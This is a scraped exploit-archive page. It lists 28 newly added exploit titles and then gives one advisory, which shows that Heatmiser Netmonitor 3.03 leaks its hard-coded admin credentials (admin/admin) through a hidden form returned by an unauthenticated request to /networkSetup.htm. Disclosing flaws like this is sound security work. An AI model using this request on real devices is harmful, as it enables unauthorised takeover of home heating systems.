
28 changes to exploits/shellcodes OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit) Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit) Microsoft UPnP - Local Privilege Elevation (Metasploit) AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC) FTP Navigator 8.03 - Stack Overflow (SEH) Wing FTP Server 6.0.7 - Unquoted Service Path Domain Quester Pro 6.02 - Stack Overflow (SEH) FreeBSD-SA-19:02.fd - Privilege Escalation FreeBSD-SA-19:15.mqueuefs - Privilege Escalation HomeAutomation 3.3.2 - Persistent Cross-Site Scripting HomeAutomation 3.3.2 - Authentication Bypass HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin) HomeAutomation 3.3.2 - Remote Code Execution elearning-script 1.0 - Authentication Bypass XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) Thrive Smart Home 1.1 - Authentication Bypass XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin) XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin) WEMS BEMS 21.3.1 - Undocumented Backdoor Account AVE DOMINAplus 1.10.x - Credential Disclosure AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm) AVE DOMINAplus 1.10.x - Authentication Bypass Heatmiser Netmonitor 3.03 - Hardcoded Credentials MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure RICOH SP 4510SF Printer - HTML Injection RICOH Web Image Monitor 1.09 - HTML Injection Heatmiser Netmonitor 3.03 - HTML Injection
34 lines
No EOL
1.4 KiB
Text
34 lines
No EOL
1.4 KiB
Text
# Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials
|
|
# Date: 2019-12-22
|
|
# Exploit Author: Ismail Tasdelen
|
|
# Vendor Homepage: https://www.heatmiser.com/en/
|
|
# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
|
|
# Software: Netmonitor v3.03
|
|
# Product Version: Netmonitor v3.03
|
|
# CWE : CWE-798
|
|
# Vulenrability: Use of Hard-coded Credentials
|
|
# CVE: N/A
|
|
|
|
# Decription :
|
|
# Hard-coded Credentials security vulnerability of Netmonitor model v3.03
|
|
# from Heatmiser manufacturer has been discovered. With this
|
|
# vulnerability, the hidFrm form in the source code of the page
|
|
# anonymously has access to hidden input codes. This information is
|
|
# contained in the input field of the hidFrm form in the source code
|
|
# lognm and logpd.
|
|
|
|
|
|
HTTP GET Request : /networkSetup.htm HTTP/1.1
|
|
|
|
<form name="hidFrm" method="post">
|
|
<input type="hidden" name="lognm" value="admin">
|
|
<input type="hidden" name="logpd" value="admin">
|
|
<input type="hidden" name="ip" value="XXX.XXX.XXX.XXX">
|
|
<input type="hidden" name="mask" value="XXX.XXX.XXX.XXX">
|
|
<input type="hidden" name="gate" value="XXX.XXX.XXX.XXX">
|
|
<input type="hidden" name="dns" value="XXX.XXX.XXX.XXX">
|
|
<input type="hidden" name="timestr" value="04:27">
|
|
<input type="hidden" name="datestr" value="23/12/2019">
|
|
<input type="hidden" name="timeflag" ,="" value="0">
|
|
<input type="hidden" name="gmtflag" ,="" value="1">
|
|
</form> |